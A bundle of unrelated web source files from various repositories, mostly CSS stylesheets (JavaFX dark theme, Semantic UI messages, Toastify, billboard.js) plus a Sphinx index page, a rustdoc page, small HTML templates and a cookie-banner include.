<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Index &mdash; TaskBuster 0.1.0 documentation</title> <link rel="stylesheet" href="_static/alabaster.css" type="text/css" /> <link rel="stylesheet" href="_static/pygments.css" type="text/css" /> <script type="text/javascript"> var DOCUMENTATION_OPTIONS = { URL_ROOT: './', VERSION: '0.1.0', COLLAPSE_INDEX: false, FILE_SUFFIX: '.html', HAS_SOURCE: true }; </script> <script type="text/javascript" src="_static/jquery.js"></script> <script type="text/javascript" src="_static/underscore.js"></script> <script type="text/javascript" src="_static/doctools.js"></script> <link rel="top" title="TaskBuster 0.1.0 documentation" href="index.html" /> <meta name="viewport" content="width=device-width, initial-scale=0.9, maximum-scale=0.9"> </head> <body role="document"> <div class="document"> <div class="documentwrapper"> <div class="bodywrapper"> <div class="body" role="main"> <h1 id="index">Index</h1> <div class="genindex-jumpbox"> </div> </div> </div> </div> <div class="sphinxsidebar" role="navigation" aria-label="main navigation"> <div class="sphinxsidebarwrapper"> <div class="relations"> <h3>Related Topics</h3> <ul> <li><a href="index.html">Documentation overview</a><ul> </ul></li> </ul> </div> <div id="searchbox" style="display: none" role="search"> <h3>Quick search</h3> <form class="search" action="search.html" method="get"> <input type="text" name="q" /> <input type="submit" value="Go" /> <input type="hidden" name="check_keywords" value="yes" /> <input type="hidden" name="area" value="default" /> </form> <p class="searchtip" style="font-size: 90%"> Enter search terms or a module, class or function name. </p> </div> <script type="text/javascript">$('#searchbox').show(0);</script> </div> </div> <div class="clearer"></div> </div> <div class="footer"> &copy;2015, Hari Subramaniam. | Powered by <a href="http://sphinx-doc.org/">Sphinx 1.3.1</a> &amp; <a href="https://github.com/bitprophet/alabaster">Alabaster 0.7.6</a> </div> </body> </html>
src/main/resources/view/DarkTheme.css
CS2103AUG2016-T13-C3/main
.background { -fx-background-color: derive(#1d1d1d, 20%); } .label { -fx-font-size: 11pt; -fx-font-family: "Segoe UI Semibold"; -fx-text-fill: #555555; -fx-opacity: 0.9; } .label-bright { -fx-font-size: 11pt; -fx-font-family: "Segoe UI Semibold"; -fx-text-fill: white; -fx-opacity: 1; } .label-header { -fx-font-size: 32pt; -fx-font-family: "Segoe UI Light"; -fx-text-fill: white; -fx-opacity: 1; } .text-field { -fx-font-size: 12pt; -fx-font-family: "Segoe UI Semibold"; } .tab-pane { -fx-padding: 0 0 0 1; } .tab-pane .tab-header-area { -fx-padding: 0 0 0 0; -fx-min-height: 0; -fx-max-height: 0; } .table-view { -fx-base: #1d1d1d; -fx-control-inner-background: #1d1d1d; -fx-background-color: #1d1d1d; -fx-table-cell-border-color: transparent; -fx-table-header-border-color: transparent; -fx-padding: 5; } .table-view .column-header-background { -fx-background-color: transparent; } .table-view .column-header, .table-view .filler { -fx-size: 35; -fx-border-width: 0 0 1 0; -fx-background-color: transparent; -fx-border-color: transparent transparent derive(-fx-base, 80%) transparent; -fx-border-insets: 0 10 1 0; } .table-view .column-header .label { -fx-font-size: 20pt; -fx-font-family: "Segoe UI Light"; -fx-text-fill: white; -fx-alignment: center-left; -fx-opacity: 1; } .table-view:focused .table-row-cell:filled:focused:selected { -fx-background-color: -fx-focus-color; } .split-pane:horizontal .split-pane-divider { -fx-border-color: transparent #1d1d1d transparent #1d1d1d; -fx-background-color: transparent, derive(#1d1d1d, 10%); } .split-pane { -fx-border-radius: 1; -fx-border-width: 1; -fx-background-color: derive(#1d1d1d, 20%); } .list-cell { -fx-label-padding: 0 0 0 0; -fx-graphic-text-gap : 0; -fx-padding: 0 0 0 0; } .list-cell .label { -fx-text-fill: #010504; } .cell_big_label { -fx-font-size: 16px; -fx-text-fill: #010504; } .cell_small_label { -fx-font-size: 11px; -fx-text-fill: #010504; } .anchor-pane { -fx-background-color: derive(#1d1d1d, 20%); } .anchor-pane-with-border { -fx-background-color: derive(#1d1d1d, 20%); -fx-border-color: derive(#1d1d1d, 10%); -fx-border-top-width: 1px; } .status-bar { -fx-background-color: derive(#1d1d1d, 20%); -fx-text-fill: black; } .result-display { -fx-background-color: #ffffff; } .result-display .label { -fx-text-fill: black !important; } .status-bar .label { -fx-text-fill: white; } .status-bar-with-border { -fx-background-color: derive(#1d1d1d, 30%); -fx-border-color: derive(#1d1d1d, 25%); -fx-border-width: 1px; } .status-bar-with-border .label { -fx-text-fill: white; } .grid-pane { -fx-background-color: derive(#1d1d1d, 30%); -fx-border-color: derive(#1d1d1d, 30%); -fx-border-width: 1px; } .grid-pane .anchor-pane { -fx-background-color: derive(#1d1d1d, 30%); } .context-menu { -fx-background-color: derive(#1d1d1d, 50%); } .context-menu .label { -fx-text-fill: white; } .menu-bar { -fx-background-color: derive(#1d1d1d, 20%); } .menu-bar .label { -fx-font-size: 14pt; -fx-font-family: "Segoe UI Light"; -fx-text-fill: white; -fx-opacity: 0.9; } .menu .left-container { -fx-background-color: black; } /* * Metro style Push Button * Author: Pedro Duque Vieira * http://pixelduke.wordpress.com/2012/10/23/jmetro-windows-8-controls-on-java/ */ .button { -fx-padding: 5 22 5 22; -fx-border-color: #e2e2e2; -fx-border-width: 2; -fx-background-radius: 0; -fx-background-color: #1d1d1d; -fx-font-family: "Segoe UI", Helvetica, Arial, sans-serif; -fx-font-size: 11pt; -fx-text-fill: #d8d8d8; -fx-background-insets: 0 0 0 0, 0, 1, 2; } .button:hover { -fx-background-color: #3a3a3a; } .button:pressed, .button:default:hover:pressed { -fx-background-color: white; -fx-text-fill: #1d1d1d; } .button:focused { -fx-border-color: white, white; -fx-border-width: 1, 1; -fx-border-style: solid, segments(1, 1); -fx-border-radius: 0, 0; -fx-border-insets: 1 1 1 1, 0; } .button:disabled, .button:default:disabled { -fx-opacity: 0.4; -fx-background-color: #1d1d1d; -fx-text-fill: white; } .button:default { -fx-background-color: -fx-focus-color; -fx-text-fill: #ffffff; } .button:default:hover { -fx-background-color: derive(-fx-focus-color, 30%); } .dialog-pane { -fx-background-color: #1d1d1d; } .dialog-pane > *.button-bar > *.container { -fx-background-color: #1d1d1d; } .dialog-pane > *.label.content { -fx-font-size: 14px; -fx-font-weight: bold; -fx-text-fill: white; } .dialog-pane:header *.header-panel { -fx-background-color: derive(#1d1d1d, 25%); } .dialog-pane:header *.header-panel *.label { -fx-font-size: 18px; -fx-font-style: italic; -fx-fill: white; -fx-text-fill: white; } .scroll-bar .thumb { -fx-background-color: derive(#1d1d1d, 50%); -fx-background-insets: 3; } .scroll-bar .increment-button, .scroll-bar .decrement-button { -fx-background-color: transparent; -fx-padding: 0 0 0 0; } .scroll-bar .increment-arrow, .scroll-bar .decrement-arrow { -fx-shape: " "; } .scroll-bar:vertical .increment-arrow, .scroll-bar:vertical .decrement-arrow { -fx-padding: 1 8 1 8; } .scroll-bar:horizontal .increment-arrow, .scroll-bar:horizontal .decrement-arrow { -fx-padding: 8 1 8 1; } #cardPane { -fx-background-color: transparent; -fx-border-color: #d6d6d6; -fx-border-width: 1 1 1 1; } #cardPane2 { -fx-background-color: transparent; -fx-border-color: #d6d6d6; -fx-border-width: 1 1 1 1; } #cardPane3 { -fx-background-color: transparent; -fx-border-color: #d6d6d6; -fx-border-width: 1 1 1 1; } #commandTypeLabel { -fx-font-size: 11px; -fx-text-fill: #F70D1A; } #filterField, #taskListPanel, #taskWebpage { -fx-effect: innershadow(gaussian, black, 10, 0, 0, 0); } #floatingTaskTitle, #deadlineTitle, #eventTitle { -fx-font-size: 13pt; -fx-font-family: "Segoe UI Semibold"; -fx-text-fill: white; -fx-font-weight: bold; -fx-opacity: 0.9; }
templates/Homepage.html
PatrickLouys/example
{% extends "Layout.html" %} {% block content %} <h1>Hello World</h1> Hello {{ name }} {% endblock %}
public/css/newaccount.css
shareonbazaar/bazaar
body { height:100%; width:100%; margin:0;padding:0; overflow:hidden; } #wrapper { width:100%; height:100%; position:absolute; top:0;left:0; overflow:hidden; background-color: #2c3e50; } #mask { width:100%; height:500%; overflow:hidden; } .item { width:100%; height:20%; display:block; } .content { width: 80%; height: 80%; top: 10%; margin: 0 auto; background-color: white; position: relative; } .navigation { margin: 0 auto; text-align: center; } .status:hover { text-decoration: none; } #item2 .question, #item3 .question { padding: 20px; } #item2 .question-content, #item3 .question-content { overflow-y: auto; height: 100%; } .question-content .question { font-size: 20px; } .question-content .options { padding-top: 60px; } #item1 .question-content { text-align: center; } .activity-group { padding: 10px; } .question, .activity-title { color: #2c3e50; } .activity { background-color: #CCCC99; padding: 10px; margin: 5px 8px 0px 8px; color: #003366; border-radius: 25px; display: inline-block; } .activity:hover { background-color: orange; } .activity.activity-selected { background-color: green; } .progress-link { padding-top: 8px; font-size: 18px; } .status { width: 150px; height: 150px; line-height: 120px; border-radius: 50%; color: white; background-color: #2c3e50; display: inline-block; margin: 10px 10px 0px 10px; text-decoration: none; padding: 20px; }
index.html
yiyuwang/yiyuwang.github.io
--- layout: single author_profile: true --- <p> I am currently a graduate student at the <a href="https://web.northeastern.edu/affectiveandbrainscienceslab/#_ga=2.59161645.1234857842.1552168398-1002430868.1506623241">Affective and Brain Sciences Lab</a> supervised by Professor Ajay Satpute at Northeastern University. </p> <p> I received my B.S. in psychology at the University of Washington in Seattle, WA. I worked with Professor <a href="http://faculty.washington.edu/agg/">Anthony Greenwald</a> for two years as his Honors advisee. From 2017 - 2018, I was a research assistant at the <a href="http://ssnl.stanford.edu/">Stanford Social Neuroscience Lab</a> supervised by Professor Jamil Zaki. </p>
_includes/cookies.html
MadridJUG/jnext
<div id="cookie_alert" class=""> <div class="wrapper"> <p>Usamos cookies para mejorar tu navegación. Si continuas navegando entendemos que aceptas su uso. <a href="/politica-de-cookies" rel="section" class="ext" title="Ver nuestra política de cookies" target="_blank">Más información</a>.</p><p></p> <button type="button" title="Entendido" class="button">Entendido</button> <div class="code hidden"></div> </div> </div>
tmp/rust/inline-sidebar-items/std/intrinsics/fn.needs_drop.html
liigo/liigo.github.io
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="generator" content="rustdoc"> <meta name="description" content="API documentation for the Rust `needs_drop` fn in crate `std`."> <meta name="keywords" content="rust, rustlang, rust-lang, needs_drop"> <title>std::intrinsics::needs_drop - Rust</title> <link rel="stylesheet" type="text/css" href="../../rustdoc.css"> <link rel="stylesheet" type="text/css" href="../../main.css"> <link rel="shortcut icon" href="https://doc.rust-lang.org/favicon.ico"> </head> <body class="rustdoc"> <!--[if lte IE 8]> <div class="warning"> This old browser is unsupported and will most likely display funky things. </div> <![endif]--> <nav class="sidebar"> <a href='../../std/index.html'><img src='https://www.rust-lang.org/logos/rust-logo-128x128-blk-v2.png' alt='logo' width='100'></a> <p class='location'><a href='../index.html'>std</a>::<wbr><a href='index.html'>intrinsics</a></p><script>window.sidebarCurrent = {name: 'needs_drop', ty: 'fn', relpath: ''};</script><script defer src="sidebar-items.js"></script> </nav> <nav class="sub"> <form class="search-form js-only"> <div class="search-container"> <input class="search-input" name="search" autocomplete="off" placeholder="Click or press ‘S’ to search, ‘?’ for more options…" type="search"> </div> </form> </nav> <section id='main' class="content fn"> <h1 class='fqn'><span class='in-band'>Function <a href='../index.html'>std</a>::<wbr><a href='index.html'>intrinsics</a>::<wbr><a class='fn' href=''>needs_drop</a></span><span class='out-of-band'><span class='since' title='Stable since Rust version '></span><span id='render-detail'> <a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs"> [<span class='inner'>&#x2212;</span>] </a> </span><a id='src-6018' class='srclink' href='https://doc.rust-lang.org/nightly/core/intrinsics/fn.needs_drop.html?gotosrc=6018' title='goto source code'>[src]</a></span></h1> <pre class='rust fn'>pub unsafe extern &quot;rust-intrinsic&quot; fn needs_drop&lt;T&gt;() -&gt; <a class='primitive' href='../primitive.bool.html'>bool</a></pre><div class='stability'><em class='stab unstable'>Unstable (<code>core_intrinsics</code>)<p>: intrinsics are unlikely to ever be stabilized, instead they should be used through stabilized interfaces in the rest of the standard library</p> </em></div><div class='docblock'><p>Returns <code>true</code> if the actual type given as <code>T</code> requires drop glue; returns <code>false</code> if the actual type provided for <code>T</code> implements <code>Copy</code>.</p> <p>If the actual type neither requires drop glue nor implements <code>Copy</code>, then may return <code>true</code> or <code>false</code>.</p> </div></section> <section id='search' class="content hidden"></section> <section class="footer"></section> <aside id="help" class="hidden"> <div> <h1 class="hidden">Help</h1> <div class="shortcuts"> <h2>Keyboard Shortcuts</h2> <dl> <dt>?</dt> <dd>Show this help dialog</dd> <dt>S</dt> <dd>Focus the search field</dd> <dt>&larrb;</dt> <dd>Move up in search results</dd> <dt>&rarrb;</dt> <dd>Move down in search results</dd> <dt>&#9166;</dt> <dd>Go to active search result</dd> <dt>+</dt> <dd>Collapse/expand all sections</dd> </dl> </div> <div class="infos"> <h2>Search Tricks</h2> <p> Prefix searches with a type followed by a colon (e.g. <code>fn:</code>) to restrict the search to a given type. </p> <p> Accepted types are: <code>fn</code>, <code>mod</code>, <code>struct</code>, <code>enum</code>, <code>trait</code>, <code>type</code>, <code>macro</code>, and <code>const</code>. </p> <p> Search functions by type signature (e.g. <code>vec -> usize</code> or <code>* -> vec</code>) </p> </div> </div> </aside> <script> window.rootPath = "../../"; window.currentCrate = "std"; window.playgroundUrl = "https://play.rust-lang.org/"; </script> <script src="../../jquery.js"></script> <script src="../../main.js"></script> <script src="../../playpen.js"></script> <script defer src="../../search-index.js"></script> </body> </html>
static/help.html
lusakasa/saka-key
<!doctype html> <html> <head> <title>Saka Key Help</title> <meta charset="UTF-8"> </head> <body> <script src="help.js"></script> </body> </html>
dist/components/message.css
Jamil-Najafov/semantic-ui-turboard
/*! * # Semantic UI 2.2.9 - Message * http://github.com/semantic-org/semantic-ui/ * * * Released under the MIT license * http://opensource.org/licenses/MIT * */ /******************************* Message *******************************/ .ui.message { position: relative; min-height: 1em; margin: 1em 0em; background: #F8F8F9; padding: 1em 1.5em; line-height: 1.4285em; color: rgba(0, 0, 0, 0.87); -webkit-transition: opacity 0s ease, color 0s ease, background 0s ease, box-shadow 0s ease; transition: opacity 0s ease, color 0s ease, background 0s ease, box-shadow 0s ease; border-radius: 0.14285714rem; box-shadow: 0px 0px 0px 1px rgba(34, 36, 38, 0.22) inset, 0px 0px 0px 0px rgba(0, 0, 0, 0); } .ui.message:first-child { margin-top: 0em; } .ui.message:last-child { margin-bottom: 0em; } /*-------------- Content ---------------*/ /* Header */ .ui.message .header { display: block; font-family: 'Roboto', 'Helvetica Neue', Arial, Helvetica, sans-serif; font-weight: bold; margin: -0.14285714em 0em 0rem 0em; } /* Default font size */ .ui.message .header:not(.ui) { font-size: 1.14285714em; } /* Paragraph */ .ui.message p { opacity: 0.85; margin: 0.75em 0em; } .ui.message p:first-child { margin-top: 0em; } .ui.message p:last-child { margin-bottom: 0em; } .ui.message .header + p { margin-top: 0.25em; } /* List */ .ui.message .list:not(.ui) { text-align: left; padding: 0em; opacity: 0.85; list-style-position: inside; margin: 0.5em 0em 0em; } .ui.message .list:not(.ui):first-child { margin-top: 0em; } .ui.message .list:not(.ui):last-child { margin-bottom: 0em; } .ui.message .list:not(.ui) li { position: relative; list-style-type: none; margin: 0em 0em 0.3em 1em; padding: 0em; } .ui.message .list:not(.ui) li:before { position: absolute; content: '•'; left: -1em; height: 100%; vertical-align: baseline; } .ui.message .list:not(.ui) li:last-child { margin-bottom: 0em; } /* Icon */ .ui.message > .icon { margin-right: 0.6em; } /* Close Icon */ .ui.message > .close.icon { cursor: pointer; position: absolute; margin: 0em; top: 0.78575em; right: 0.5em; opacity: 0.7; -webkit-transition: opacity 0s ease; transition: opacity 0s ease; } .ui.message > .close.icon:hover { opacity: 1; } /* First / Last Element */ .ui.message > :first-child { margin-top: 0em; } .ui.message > :last-child { margin-bottom: 0em; } /******************************* Coupling *******************************/ .ui.dropdown .menu > .message { margin: 0px -1px; } /******************************* States *******************************/ /*-------------- Visible ---------------*/ .ui.visible.visible.visible.visible.message { display: block; } .ui.icon.visible.visible.visible.visible.message { display: -webkit-box; display: -ms-flexbox; display: flex; } /*-------------- Hidden ---------------*/ .ui.hidden.hidden.hidden.hidden.message { display: none; } /******************************* Variations *******************************/ /*-------------- Compact ---------------*/ .ui.compact.message { display: inline-block; } /*-------------- Attached ---------------*/ .ui.attached.message { margin-bottom: -1px; border-radius: 0.14285714rem 0.14285714rem 0em 0em; box-shadow: 0em 0em 0em 1px rgba(34, 36, 38, 0.15) inset; margin-left: -1px; margin-right: -1px; } .ui.attached + .ui.attached.message:not(.top):not(.bottom) { margin-top: -1px; border-radius: 0em; } .ui.bottom.attached.message { margin-top: -1px; border-radius: 0em 0em 0.14285714rem 0.14285714rem; box-shadow: 0em 0em 0em 1px rgba(34, 36, 38, 0.15) inset, 0px 1px 2px 0 rgba(34, 36, 38, 0.15); } .ui.bottom.attached.message:not(:last-child) { margin-bottom: 1em; } .ui.attached.icon.message { width: auto; } /*-------------- Icon ---------------*/ .ui.icon.message { display: -webkit-box; display: -ms-flexbox; display: flex; width: 100%; -webkit-box-align: center; -ms-flex-align: center; align-items: center; } .ui.icon.message > .icon:not(.close) { display: block; -webkit-box-flex: 0; -ms-flex: 0 0 auto; flex: 0 0 auto; width: auto; line-height: 1; vertical-align: middle; font-size: 3em; opacity: 0.8; } .ui.icon.message > .content { display: block; -webkit-box-flex: 1; -ms-flex: 1 1 auto; flex: 1 1 auto; vertical-align: middle; } .ui.icon.message .icon:not(.close) + .content { padding-left: 0rem; } .ui.icon.message .circular.icon { width: 1em; } /*-------------- Floating ---------------*/ .ui.floating.message { box-shadow: 0px 0px 0px 1px rgba(34, 36, 38, 0.22) inset, 0px 2px 4px 0px rgba(34, 36, 38, 0.12), 0px 2px 10px 0px rgba(34, 36, 38, 0.15); } /*-------------- Colors ---------------*/ .ui.black.message { background-color: #1B1C1D; color: rgba(255, 255, 255, 0.9); } /*-------------- Types ---------------*/ /* Positive */ .ui.positive.message { background-color: #FCFFF5; color: #2C662D; } .ui.positive.message, .ui.attached.positive.message { box-shadow: 0px 0px 0px 1px #A3C293 inset, 0px 0px 0px 0px rgba(0, 0, 0, 0); } .ui.positive.message .header { color: #1A531B; } /* Negative */ .ui.negative.message { background-color: #FFF6F6; color: #9F3A38; } .ui.negative.message, .ui.attached.negative.message { box-shadow: 0px 0px 0px 1px #E0B4B4 inset, 0px 0px 0px 0px rgba(0, 0, 0, 0); } .ui.negative.message .header { color: #912D2B; } /* Info */ .ui.info.message { background-color: #F8FFFF; color: #276F86; } .ui.info.message, .ui.attached.info.message { box-shadow: 0px 0px 0px 1px #A9D5DE inset, 0px 0px 0px 0px rgba(0, 0, 0, 0); } .ui.info.message .header { color: #0E566C; } /* Warning */ .ui.warning.message { background-color: #FFFAF3; color: #573A08; } .ui.warning.message, .ui.attached.warning.message { box-shadow: 0px 0px 0px 1px #C9BA9B inset, 0px 0px 0px 0px rgba(0, 0, 0, 0); } .ui.warning.message .header { color: #794B02; } /* Error */ .ui.error.message { background-color: #FFF6F6; color: #9F3A38; } .ui.error.message, .ui.attached.error.message { box-shadow: 0px 0px 0px 1px #E0B4B4 inset, 0px 0px 0px 0px rgba(0, 0, 0, 0); } .ui.error.message .header { color: #912D2B; } /* Success */ .ui.success.message { background-color: #FCFFF5; color: #2C662D; } .ui.success.message, .ui.attached.success.message { box-shadow: 0px 0px 0px 1px #A3C293 inset, 0px 0px 0px 0px rgba(0, 0, 0, 0); } .ui.success.message .header { color: #1A531B; } /* Colors */ .ui.inverted.message, .ui.black.message { background-color: #1B1C1D; color: rgba(255, 255, 255, 0.9); } .ui.red.message { background-color: #FFE8E6; color: #DB2828; box-shadow: 0px 0px 0px 1px #DB2828 inset, 0px 0px 0px 0px rgba(0, 0, 0, 0); } .ui.red.message .header { color: #c82121; } .ui.orange.message { background-color: #FFEDDE; color: #F2711C; box-shadow: 0px 0px 0px 1px #F2711C inset, 0px 0px 0px 0px rgba(0, 0, 0, 0); } .ui.orange.message .header { color: #e7640d; } .ui.yellow.message { background-color: #FFF8DB; color: #B58105; box-shadow: 0px 0px 0px 1px #B58105 inset, 0px 0px 0px 0px rgba(0, 0, 0, 0); } .ui.yellow.message .header { color: #9c6f04; } .ui.olive.message { background-color: #FBFDEF; color: #8ABC1E; box-shadow: 0px 0px 0px 1px #8ABC1E inset, 0px 0px 0px 0px rgba(0, 0, 0, 0); } .ui.olive.message .header { color: #7aa61a; } .ui.green.message { background-color: #E5F9E7; color: #1EBC30; box-shadow: 0px 0px 0px 1px #1EBC30 inset, 0px 0px 0px 0px rgba(0, 0, 0, 0); } .ui.green.message .header { color: #1aa62a; } .ui.teal.message { background-color: #E1F7F7; color: #10A3A3; box-shadow: 0px 0px 0px 1px #10A3A3 inset, 0px 0px 0px 0px rgba(0, 0, 0, 0); } .ui.teal.message .header { color: #0e8c8c; } .ui.blue.message { background-color: #DFF0FF; color: #488FC7; box-shadow: 0px 0px 0px 1px #488FC7 inset, 0px 0px 0px 0px rgba(0, 0, 0, 0); } .ui.blue.message .header { color: #3a82bc; } .ui.violet.message { background-color: #EAE7FF; color: #6435C9; box-shadow: 0px 0px 0px 1px #6435C9 inset, 0px 0px 0px 0px rgba(0, 0, 0, 0); } .ui.violet.message .header { color: #5a30b5; } .ui.purple.message { background-color: #F6E7FF; color: #A333C8; box-shadow: 0px 0px 0px 1px #A333C8 inset, 0px 0px 0px 0px rgba(0, 0, 0, 0); } .ui.purple.message .header { color: #922eb4; } .ui.pink.message { background-color: #FFE3FB; color: #E03997; box-shadow: 0px 0px 0px 1px #E03997 inset, 0px 0px 0px 0px rgba(0, 0, 0, 0); } .ui.pink.message .header { color: #dd238b; } .ui.brown.message { background-color: #F1E2D3; color: #A5673F; box-shadow: 0px 0px 0px 1px #A5673F inset, 0px 0px 0px 0px rgba(0, 0, 0, 0); } .ui.brown.message .header { color: #935b38; } /*-------------- Sizes ---------------*/ .ui.mini.message { font-size: 0.78571429em; } .ui.tiny.message { font-size: 0.85714286em; } .ui.small.message { font-size: 0.92857143em; } .ui.message { font-size: 1em; } .ui.large.message { font-size: 1.14285714em; } .ui.big.message { font-size: 1.28571429em; } .ui.huge.message { font-size: 1.42857143em; } .ui.massive.message { font-size: 1.71428571em; } /******************************* Theme Overrides *******************************/ /******************************* Site Overrides *******************************/
ajax/libs/toastify-js/1.11.1/toastify.css
cdnjs/cdnjs
/*! * Toastify js 1.11.1 * https://github.com/apvarun/toastify-js * @license MIT licensed * * Copyright (C) 2018 Varun A P */ .toastify { padding: 12px 20px; color: #ffffff; display: inline-block; box-shadow: 0 3px 6px -1px rgba(0, 0, 0, 0.12), 0 10px 36px -4px rgba(77, 96, 232, 0.3); background: -webkit-linear-gradient(315deg, #73a5ff, #5477f5); background: linear-gradient(135deg, #73a5ff, #5477f5); position: fixed; opacity: 0; transition: all 0.4s cubic-bezier(0.215, 0.61, 0.355, 1); border-radius: 2px; cursor: pointer; text-decoration: none; max-width: calc(50% - 20px); z-index: 2147483647; } .toastify.on { opacity: 1; } .toast-close { opacity: 0.4; padding: 0 5px; } .toastify-right { right: 15px; } .toastify-left { left: 15px; } .toastify-top { top: -150px; } .toastify-bottom { bottom: -150px; } .toastify-rounded { border-radius: 25px; } .toastify-avatar { width: 1.5em; height: 1.5em; margin: -7px 5px; border-radius: 2px; } .toastify-center { margin-left: auto; margin-right: auto; left: 0; right: 0; max-width: fit-content; max-width: -moz-fit-content; } @media only screen and (max-width: 360px) { .toastify-right, .toastify-left { margin-left: auto; margin-right: auto; left: 0; right: 0; max-width: fit-content; } }
ajax/libs/billboard.js/1.12.0-next.2/theme/graph.css
cdnjs/cdnjs
/*! * Copyright (c) 2017 ~ present NAVER Corp. * billboard.js project is licensed under the MIT license * * billboard.js, JavaScript chart library * http://naver.github.io/billboard.js/ * * @version 1.12.0-next.2 */ /*-- Graph Theme --*/ /*-- Default color pattern --*/ .bb-color-pattern { background-image: url("#65CFC2;#D0A45F;#64A4F5;#EF65A2;#A377FE;#8AAEC7;#FF7E5A;#898EFE;#FFAC35;#70B0FF;"); } /*-- Chart --*/ .bb svg { font-size: 12px; font-family: Helvetica, "Apple SD Gothic Neo", Arial, sans-serif, "nanumgothic", "Dotum"; line-height: 1; } .bb path, .bb line { fill: none; stroke: #8c8c8c; } .bb text, .bb .bb-button { -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; fill: #555; font-size: 12px; letter-spacing: -.3px; } .bb-legend-item-title, .bb-xgrid-focus, .bb-ygrid-focus, .bb-ygrid, .bb-event-rect, .bb-bars path { shape-rendering: crispEdges; } /*-- Axis --*/ .bb-axis { shape-rendering: crispEdges; } .bb-axis-y text, .bb-axis-y2 text { fill: #8c8c8c; } .bb-event-rects { fill-opacity: 1 !important; } .bb-event-rects .bb-event-rect { fill: transparent; } .bb-event-rects .bb-event-rect._active_ { fill: rgba(39, 201, 3, 0.05); } .tick._active_ text { fill: #00c83c !important; } /*-- Grid --*/ .bb-grid line { stroke: #f1f1f1; } .bb-xgrid-focus line, .bb-ygrid-focus line { stroke: #ffb6b6; stroke-dasharray: 3px; } /*-- Text on Chart --*/ .bb-text.bb-empty { fill: #767676; } /*-- Line --*/ .bb-line { stroke-width: 1px; } /*-- Point --*/ .bb-circle._expanded_ { stroke-width: 2px; } rect.bb-circle._expanded_, use.bb-circle._expanded_ { stroke-width: 2px; } .bb-selected-circle { fill: white; stroke-width: 2px; } /*-- Bar --*/ .bb-bar { stroke-width: 0; } .bb-bar._expanded_ { fill-opacity: 0.75; } /*-- Focus --*/ .bb-target.bb-focused { opacity: 1; } .bb-target.bb-focused path.bb-line, .bb-target.bb-focused path.bb-step { stroke-width: 2px; } .bb-target.bb-defocused { opacity: 0.3 !important; } .bb-target.bb-defocused .text-overlapping { opacity: .05 !important; } /*-- Region --*/ .bb-region { fill: steelblue; fill-opacity: 0.1; } .bb-region.selected rect { fill: #27c903; } /*-- Zoom region --*/ .bb-zoom-brush { fill-opacity: .1; } /*-- Brush --*/ .bb-brush .extent { fill-opacity: 0.1; } /*-- Select - Drag --*/ /*-- Legend --*/ .bb-legend-item { user-select: none; } .bb-legend-item-hidden { opacity: 0.15; } .bb-legend-background { opacity: 0.75; fill: white; stroke: lightgray; stroke-width: 1px; } .bb-legend-item line { stroke-dasharray: 1px; } /*-- Title --*/ .bb-title { font-size: 14px; } /*-- Tooltip --*/ .bb-tooltip-container { z-index: 10; font-family: Helvetica, "Apple SD Gothic Neo", Arial, sans-serif, "nanumgothic", "Dotum"; user-select: none; } .bb-tooltip { -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; border-collapse: separate; border-spacing: 0; empty-cells: show; border: 1px solid #999; border-radius: 2px; background-color: #fff; text-align: left; font-size: 12px; box-shadow: .5px .5px 1px #999; } .bb-tooltip th { font-size: 12px; padding: 4px 8px; text-align: center; border-bottom: dotted 1px #000; background-color: #efefef; color: #000; } .bb-tooltip tr:last-child td { border-bottom: none; } .bb-tooltip td { padding: 3px 6px; background-color: #fff; border-bottom: solid 1px #eee; } .bb-tooltip td:first-child { padding-left: 5px; border-right: solid 1px #eee; } .bb-tooltip td:last-child { padding-right: 5px; } .bb-tooltip td > span, .bb-tooltip td > svg { display: inline-block; width: 5px; height: 12px; margin-right: 6px; vertical-align: middle; } .bb-tooltip td.value { border-left: 1px solid transparent; text-align: right; } .bb-tooltip .bb-tooltip-title { display: inline-block; color: #aaa; line-height: 20px; } .bb-tooltip .bb-tooltip-detail table { border-collapse: collapse; border-spacing: 1px; font-size: 12px; } .bb-tooltip .bb-tooltip-detail .bb-tooltip-name, .bb-tooltip .bb-tooltip-detail .bb-tooltip-value { line-height: 13px; padding: 4px 0 3px; color: #444; text-align: left; font-weight: normal; } .bb-tooltip .bb-tooltip-detail .bb-tooltip-value { padding-left: 5px; font-weight: 800; } /*-- Area --*/ .bb-area { stroke-width: 0; opacity: 0.2; } /*-- Arc --*/ .bb-chart-arcs-title { dominant-baseline: middle; font-size: 1.3em; } .bb-chart-arcs-gauge-title { dominant-baseline: middle; font-size: 2.7em; } .bb-chart-arcs .bb-chart-arcs-background { fill: #e0e0e0; stroke: #fff; } .bb-chart-arcs .bb-chart-arcs-gauge-unit { fill: #000; font-size: 16px; } .bb-chart-arcs .bb-chart-arcs-gauge-min, .bb-chart-arcs .bb-chart-arcs-gauge-max { fill: #777; } .bb-chart-arcs .bb-chart-arcs-title { font-size: 16px !important; fill: #8c8c8c; font-style: italic; } .bb-chart-arcs path.empty { fill: #eaeaea; stroke-width: 0; } .bb-chart-arc .bb-gauge-value { fill: #8c8c8c; font-style: italic; } .bb-chart-arc path { stroke: #fff; } .bb-chart-arc rect { stroke: white; stroke-width: 1; } .bb-chart-arc text { fill: #fff; font-size: 13px; font-weight: bold; } /*-- Radar --*/ .bb-chart-radars .bb-levels polygon { fill: none; stroke: #8c8c8c; stroke-width: .5px; } .bb-chart-radars .bb-levels text { fill: #8c8c8c; } .bb-chart-radars .bb-axis line { stroke: #8c8c8c; stroke-width: .5px; } .bb-chart-radars .bb-axis text { font-size: 1.15em; font-weight: bold; cursor: default; } .bb-chart-radars .bb-shapes polygon { fill-opacity: .2; stroke-width: 1px; } /*-- Button --*/ .bb-button { position: absolute; top: 10px; right: 10px; } .bb-button .bb-zoom-reset { border: solid 1px #ccc; background-color: #fff; padding: 5px; border-radius: 5px; cursor: pointer; opacity: .8; box-shadow: 1px 1px 2px #ccc; }
ajax/libs/litepicker/2.0.7/css/plugins/mobilefriendly.js.css
cdnjs/cdnjs
